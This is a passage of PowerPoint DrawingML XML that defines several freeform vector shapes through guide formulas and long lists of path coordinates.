                  <a:gd name="T69" fmla="*/ 0 h 71"/>
                  <a:gd name="T70" fmla="*/ 0 w 188"/>
                  <a:gd name="T71" fmla="*/ 0 h 71"/>
                  <a:gd name="T72" fmla="*/ 0 w 188"/>
                  <a:gd name="T73" fmla="*/ 0 h 71"/>
                  <a:gd name="T74" fmla="*/ 0 w 188"/>
                  <a:gd name="T75" fmla="*/ 0 h 71"/>
                  <a:gd name="T76" fmla="*/ 0 w 188"/>
                  <a:gd name="T77" fmla="*/ 0 h 71"/>
                  <a:gd name="T78" fmla="*/ 0 w 188"/>
                  <a:gd name="T79" fmla="*/ 0 h 71"/>
                  <a:gd name="T80" fmla="*/ 0 w 188"/>
                  <a:gd name="T81" fmla="*/ 0 h 71"/>
                  <a:gd name="T82" fmla="*/ 0 w 188"/>
                  <a:gd name="T83" fmla="*/ 0 h 71"/>
                  <a:gd name="T84" fmla="*/ 0 w 188"/>
                  <a:gd name="T85" fmla="*/ 0 h 71"/>
                  <a:gd name="T86" fmla="*/ 0 w 188"/>
                  <a:gd name="T87" fmla="*/ 0 h 71"/>
                  <a:gd name="T88" fmla="*/ 0 w 188"/>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8"/>
                  <a:gd name="T136" fmla="*/ 0 h 71"/>
                  <a:gd name="T137" fmla="*/ 188 w 188"/>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8" h="71">
                    <a:moveTo>
                      <a:pt x="2" y="52"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="8" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="52"/>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4133" name="Freeform 107"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="456" y="2567"/>
                <a:ext cx="22" cy="7"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 65"/>
                  <a:gd name="T1" fmla="*/ 0 h 23"/>
                  <a:gd name="T2" fmla="*/ 0 w 65"/>
                  <a:gd name="T3" fmla="*/ 0 h 23"/>
                  <a:gd name="T4" fmla="*/ 0 w 65"/>
                  <a:gd name="T5" fmla="*/ 0 h 23"/>
                  <a:gd name="T6" fmla="*/ 0 w 65"/>
                  <a:gd name="T7" fmla="*/ 0 h 23"/>
                  <a:gd name="T8" fmla="*/ 0 w 65"/>
                  <a:gd name="T9" fmla="*/ 0 h 23"/>
                  <a:gd name="T10" fmla="*/ 0 w 65"/>
                  <a:gd name="T11" fmla="*/ 0 h 23"/>
                  <a:gd name="T12" fmla="*/ 0 w 65"/>
                  <a:gd name="T13" fmla="*/ 0 h 23"/>
                  <a:gd name="T14" fmla="*/ 0 w 65"/>
                  <a:gd name="T15" fmla="*/ 0 h 23"/>
                  <a:gd name="T16" fmla="*/ 0 w 65"/>
                  <a:gd name="T17" fmla="*/ 0 h 23"/>
                  <a:gd name="T18" fmla="*/ 0 w 65"/>
                  <a:gd name="T19" fmla="*/ 0 h 23"/>
                  <a:gd name="T20" fmla="*/ 0 w 65"/>
                  <a:gd name="T21" fmla="*/ 0 h 23"/>
                  <a:gd name="T22" fmla="*/ 0 w 65"/>
                  <a:gd name="T23" fmla="*/ 0 h 23"/>
                  <a:gd name="T24" fmla="*/ 0 w 65"/>
                  <a:gd name="T25" fmla="*/ 0 h 23"/>
                  <a:gd name="T26" fmla="*/ 0 w 65"/>
                  <a:gd name="T27" fmla="*/ 0 h 23"/>
                  <a:gd name="T28" fmla="*/ 0 w 65"/>
                  <a:gd name="T29" fmla="*/ 0 h 23"/>
                  <a:gd name="T30" fmla="*/ 0 w 65"/>
                  <a:gd name="T31" fmla="*/ 0 h 23"/>
                  <a:gd name="T32" fmla="*/ 0 w 65"/>
                  <a:gd name="T33" fmla="*/ 0 h 23"/>
                  <a:gd name="T34" fmla="*/ 0 w 65"/>
                  <a:gd name="T35" fmla="*/ 0 h 23"/>
                  <a:gd name="T36" fmla="*/ 0 w 65"/>
                  <a:gd name="T37" fmla="*/ 0 h 23"/>
                  <a:gd name="T38" fmla="*/ 0 w 65"/>
                  <a:gd name="T39" fmla="*/ 0 h 23"/>
                  <a:gd name="T40" fmla="*/ 0 w 65"/>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3"/>
                  <a:gd name="T65" fmla="*/ 65 w 65"/>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3">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0"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4134" name="Freeform 108"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="383" y="2461"/>
                <a:ext cx="11" cy="9"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 31"/>
                  <a:gd name="T1" fmla="*/ 0 h 28"/>
                  <a:gd name="T2" fmla="*/ 0 w 31"/>
                  <a:gd name="T3" fmla="*/ 0 h 28"/>
                  <a:gd name="T4" fmla="*/ 0 w 31"/>
                  <a:gd name="T5" fmla="*/ 0 h 28"/>
                  <a:gd name="T6" fmla="*/ 0 w 31"/>
                  <a:gd name="T7" fmla="*/ 0 h 28"/>
                  <a:gd name="T8" fmla="*/ 0 w 31"/>
                  <a:gd name="T9" fmla="*/ 0 h 28"/>
                  <a:gd name="T10" fmla="*/ 0 w 31"/>
                  <a:gd name="T11" fmla="*/ 0 h 28"/>
                  <a:gd name="T12" fmla="*/ 0 w 31"/>
                  <a:gd name="T13" fmla="*/ 0 h 28"/>
                  <a:gd name="T14" fmla="*/ 0 w 31"/>
                  <a:gd name="T15" fmla="*/ 0 h 28"/>
                  <a:gd name="T16" fmla="*/ 0 w 31"/>
                  <a:gd name="T17" fmla="*/ 0 h 28"/>
                  <a:gd name="T18" fmla="*/ 0 w 31"/>
                  <a:gd name="T19" fmla="*/ 0 h 28"/>
                  <a:gd name="T20" fmla="*/ 0 w 31"/>
                  <a:gd name="T21" fmla="*/ 0 h 28"/>
                  <a:gd name="T22" fmla="*/ 0 w 31"/>
                  <a:gd name="T23" fmla="*/ 0 h 28"/>
                  <a:gd name="T24" fmla="*/ 0 w 31"/>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28"/>
                  <a:gd name="T41" fmla="*/ 31 w 31"/>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28">
                    <a:moveTo>
                      <a:pt x="21" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="25" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21"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4135" name="Freeform 109"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="349" y="2396"/>
                <a:ext cx="57" cy="24"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 176"/>
                  <a:gd name="T1" fmla="*/ 0 h 72"/>
                  <a:gd name="T2" fmla="*/ 0 w 176"/>
                  <a:gd name="T3" fmla="*/ 0 h 72"/>
                  <a:gd name="T4" fmla="*/ 0 w 176"/>
                  <a:gd name="T5" fmla="*/ 0 h 72"/>
                  <a:gd name="T6" fmla="*/ 0 w 176"/>
                  <a:gd name="T7" fmla="*/ 0 h 72"/>
                  <a:gd name="T8" fmla="*/ 0 w 176"/>
                  <a:gd name="T9" fmla="*/ 0 h 72"/>
                  <a:gd name="T10" fmla="*/ 0 w 176"/>
                  <a:gd name="T11" fmla="*/ 0 h 72"/>
                  <a:gd name="T12" fmla="*/ 0 w 176"/>
                  <a:gd name="T13" fmla="*/ 0 h 72"/>
                  <a:gd name="T14" fmla="*/ 0 w 176"/>
                  <a:gd name="T15" fmla="*/ 0 h 72"/>
                  <a:gd name="T16" fmla="*/ 0 w 176"/>
                  <a:gd name="T17" fmla="*/ 0 h 72"/>
                  <a:gd name="T18" fmla="*/ 0 w 176"/>
                  <a:gd name="T19" fmla="*/ 0 h 72"/>
                  <a:gd name="T20" fmla="*/ 0 w 176"/>
                  <a:gd name="T21" fmla="*/ 0 h 72"/>
                  <a:gd name="T22" fmla="*/ 0 w 176"/>
                  <a:gd name="T23" fmla="*/ 0 h 72"/>
                  <a:gd name="T24" fmla="*/ 0 w 176"/>
                  <a:gd name="T25" fmla="*/ 0 h 72"/>
                  <a:gd name="T26" fmla="*/ 0 w 176"/>
                  <a:gd name="T27" fmla="*/ 0 h 72"/>
                  <a:gd name="T28" fmla="*/ 0 w 176"/>
                  <a:gd name="T29" fmla="*/ 0 h 72"/>
                  <a:gd name="T30" fmla="*/ 0 w 176"/>
                  <a:gd name="T31" fmla="*/ 0 h 72"/>
                  <a:gd name="T32" fmla="*/ 0 w 176"/>
                  <a:gd name="T33" fmla="*/ 0 h 72"/>
                  <a:gd name="T34" fmla="*/ 0 w 176"/>
                  <a:gd name="T35" fmla="*/ 0 h 72"/>
                  <a:gd name="T36" fmla="*/ 0 w 176"/>
                  <a:gd name="T37" fmla="*/ 0 h 72"/>
                  <a:gd name="T38" fmla="*/ 0 w 176"/>
                  <a:gd name="T39" fmla="*/ 0 h 72"/>
                  <a:gd name="T40" fmla="*/ 0 w 176"/>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6"/>
                  <a:gd name="T64" fmla="*/ 0 h 72"/>
                  <a:gd name="T65" fmla="*/ 176 w 176"/>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6" h="72">
                    <a:moveTo>
                      <a:pt x="170" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="172" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170"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4136" name="Freeform 110"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="300" y="2474"/>
                <a:ext cx="10" cy="24"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 31"/>
                  <a:gd name="T1" fmla="*/ 0 h 71"/>
                  <a:gd name="T2" fmla="*/ 0 w 31"/>
                  <a:gd name="T3" fmla="*/ 0 h 71"/>
                  <a:gd name="T4" fmla="*/ 0 w 31"/>
                  <a:gd name="T5" fmla="*/ 0 h 71"/>
                  <a:gd name="T6" fmla="*/ 0 w 31"/>
                  <a:gd name="T7" fmla="*/ 0 h 71"/>
                  <a:gd name="T8" fmla="*/ 0 w 31"/>
                  <a:gd name="T9" fmla="*/ 0 h 71"/>
                  <a:gd name="T10" fmla="*/ 0 w 31"/>
                  <a:gd name="T11" fmla="*/ 0 h 71"/>
                  <a:gd name="T12" fmla="*/ 0 w 31"/>
                  <a:gd name="T13" fmla="*/ 0 h 71"/>
                  <a:gd name="T14" fmla="*/ 0 w 31"/>
                  <a:gd name="T15" fmla="*/ 0 h 71"/>
                  <a:gd name="T16" fmla="*/ 0 w 31"/>
                  <a:gd name="T17" fmla="*/ 0 h 71"/>
                  <a:gd name="T18" fmla="*/ 0 w 31"/>
                  <a:gd name="T19" fmla="*/ 0 h 71"/>
                  <a:gd name="T20" fmla="*/ 0 w 31"/>
                  <a:gd name="T21" fmla="*/ 0 h 71"/>
                  <a:gd name="T22" fmla="*/ 0 w 31"/>
                  <a:gd name="T23" fmla="*/ 0 h 71"/>
                  <a:gd name="T24" fmla="*/ 0 w 31"/>
                  <a:gd name="T25" fmla="*/ 0 h 71"/>
                  <a:gd name="T26" fmla="*/ 0 w 31"/>
                  <a:gd name="T27" fmla="*/ 0 h 71"/>
                  <a:gd name="T28" fmla="*/ 0 w 31"/>
                  <a:gd name="T29" fmla="*/ 0 h 71"/>
                  <a:gd name="T30" fmla="*/ 0 w 31"/>
                  <a:gd name="T31" fmla="*/ 0 h 71"/>
                  <a:gd name="T32" fmla="*/ 0 w 31"/>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71"/>
                  <a:gd name="T53" fmla="*/ 31 w 31"/>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71">
                    <a:moveTo>
                      <a:pt x="0" y="69"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="69"/>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4137" name="Freeform 111"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="309" y="2499"/>
                <a:ext cx="23" cy="22"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 72"/>
                  <a:gd name="T1" fmla="*/ 0 h 70"/>
                  <a:gd name="T2" fmla="*/ 0 w 72"/>
                  <a:gd name="T3" fmla="*/ 0 h 70"/>
                  <a:gd name="T4" fmla="*/ 0 w 72"/>
                  <a:gd name="T5" fmla="*/ 0 h 70"/>
                  <a:gd name="T6" fmla="*/ 0 w 72"/>
                  <a:gd name="T7" fmla="*/ 0 h 70"/>
                  <a:gd name="T8" fmla="*/ 0 w 72"/>
                  <a:gd name="T9" fmla="*/ 0 h 70"/>
                  <a:gd name="T10" fmla="*/ 0 w 72"/>
                  <a:gd name="T11" fmla="*/ 0 h 70"/>
                  <a:gd name="T12" fmla="*/ 0 w 72"/>
                  <a:gd name="T13" fmla="*/ 0 h 70"/>
                  <a:gd name="T14" fmla="*/ 0 w 72"/>
                  <a:gd name="T15" fmla="*/ 0 h 70"/>
                  <a:gd name="T16" fmla="*/ 0 w 72"/>
                  <a:gd name="T17" fmla="*/ 0 h 70"/>
                  <a:gd name="T18" fmla="*/ 0 w 72"/>
                  <a:gd name="T19" fmla="*/ 0 h 70"/>
                  <a:gd name="T20" fmla="*/ 0 w 72"/>
                  <a:gd name="T21" fmla="*/ 0 h 70"/>
                  <a:gd name="T22" fmla="*/ 0 w 72"/>
                  <a:gd name="T23" fmla="*/ 0 h 70"/>
                  <a:gd name="T24" fmla="*/ 0 w 72"/>
                  <a:gd name="T25" fmla="*/ 0 h 70"/>
                  <a:gd name="T26" fmla="*/ 0 w 72"/>
                  <a:gd name="T27" fmla="*/ 0 h 70"/>
                  <a:gd name="T28" fmla="*/ 0 w 72"/>
                  <a:gd name="T29" fmla="*/ 0 h 70"/>
                  <a:gd name="T30" fmla="*/ 0 w 72"/>
                  <a:gd name="T31" fmla="*/ 0 h 70"/>
                  <a:gd name="T32" fmla="*/ 0 w 72"/>
                  <a:gd name="T33" fmla="*/ 0 h 70"/>
                  <a:gd name="T34" fmla="*/ 0 w 72"/>
                  <a:gd name="T35" fmla="*/ 0 h 70"/>
                  <a:gd name="T36" fmla="*/ 0 w 72"/>
                  <a:gd name="T37" fmla="*/ 0 h 70"/>
                  <a:gd name="T38" fmla="*/ 0 w 72"/>
                  <a:gd name="T39" fmla="*/ 0 h 70"/>
                  <a:gd name="T40" fmla="*/ 0 w 72"/>
                  <a:gd name="T41" fmla="*/ 0 h 70"/>
                  <a:gd name="T42" fmla="*/ 0 w 72"/>
                  <a:gd name="T43" fmla="*/ 0 h 70"/>
                  <a:gd name="T44" fmla="*/ 0 w 72"/>
                  <a:gd name="T45" fmla="*/ 0 h 70"/>
                  <a:gd name="T46" fmla="*/ 0 w 72"/>
                  <a:gd name="T47" fmla="*/ 0 h 70"/>
                  <a:gd name="T48" fmla="*/ 0 w 72"/>
                  <a:gd name="T49" fmla="*/ 0 h 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70"/>
                  <a:gd name="T77" fmla="*/ 72 w 72"/>
                  <a:gd name="T78" fmla="*/ 70 h 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70">
                    <a:moveTo>
                      <a:pt x="19" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="22" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19"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4138" name="Freeform 112"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="310" y="2485"/>
                <a:ext cx="5" cy="9"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 16"/>
                  <a:gd name="T1" fmla="*/ 0 h 30"/>
                  <a:gd name="T2" fmla="*/ 0 w 16"/>
                  <a:gd name="T3" fmla="*/ 0 h 30"/>
                  <a:gd name="T4" fmla="*/ 0 w 16"/>
                  <a:gd name="T5" fmla="*/ 0 h 30"/>
                  <a:gd name="T6" fmla="*/ 0 w 16"/>
                  <a:gd name="T7" fmla="*/ 0 h 30"/>
                  <a:gd name="T8" fmla="*/ 0 w 16"/>
                  <a:gd name="T9" fmla="*/ 0 h 30"/>
                  <a:gd name="T10" fmla="*/ 0 w 16"/>
                  <a:gd name="T11" fmla="*/ 0 h 30"/>
                  <a:gd name="T12" fmla="*/ 0 w 16"/>
                  <a:gd name="T13" fmla="*/ 0 h 30"/>
                  <a:gd name="T14" fmla="*/ 0 w 16"/>
                  <a:gd name="T15" fmla="*/ 0 h 30"/>
                  <a:gd name="T16" fmla="*/ 0 w 16"/>
                  <a:gd name="T17" fmla="*/ 0 h 30"/>
                  <a:gd name="T18" fmla="*/ 0 w 16"/>
                  <a:gd name="T19" fmla="*/ 0 h 30"/>
                  <a:gd name="T20" fmla="*/ 0 w 16"/>
                  <a:gd name="T21" fmla="*/ 0 h 30"/>
                  <a:gd name="T22" fmla="*/ 0 w 16"/>
                  <a:gd name="T23" fmla="*/ 0 h 30"/>
                  <a:gd name="T24" fmla="*/ 0 w 16"/>
                  <a:gd name="T25" fmla="*/ 0 h 30"/>
                  <a:gd name="T26" fmla="*/ 0 w 16"/>
                  <a:gd name="T27" fmla="*/ 0 h 30"/>
                  <a:gd name="T28" fmla="*/ 0 w 16"/>
                  <a:gd name="T29" fmla="*/ 0 h 30"/>
                  <a:gd name="T30" fmla="*/ 0 w 16"/>
                  <a:gd name="T31" fmla="*/ 0 h 30"/>
                  <a:gd name="T32" fmla="*/ 0 w 16"/>
                  <a:gd name="T33" fmla="*/ 0 h 30"/>
                  <a:gd name="T34" fmla="*/ 0 w 16"/>
                  <a:gd name="T35" fmla="*/ 0 h 30"/>
                  <a:gd name="T36" fmla="*/ 0 w 16"/>
                  <a:gd name="T37" fmla="*/ 0 h 30"/>
                  <a:gd name="T38" fmla="*/ 0 w 16"/>
                  <a:gd name="T39" fmla="*/ 0 h 30"/>
                  <a:gd name="T40" fmla="*/ 0 w 16"/>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
                  <a:gd name="T64" fmla="*/ 0 h 30"/>
                  <a:gd name="T65" fmla="*/ 16 w 16"/>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 h="30">
                    <a:moveTo>
                      <a:pt x="7" y="30"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="5" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
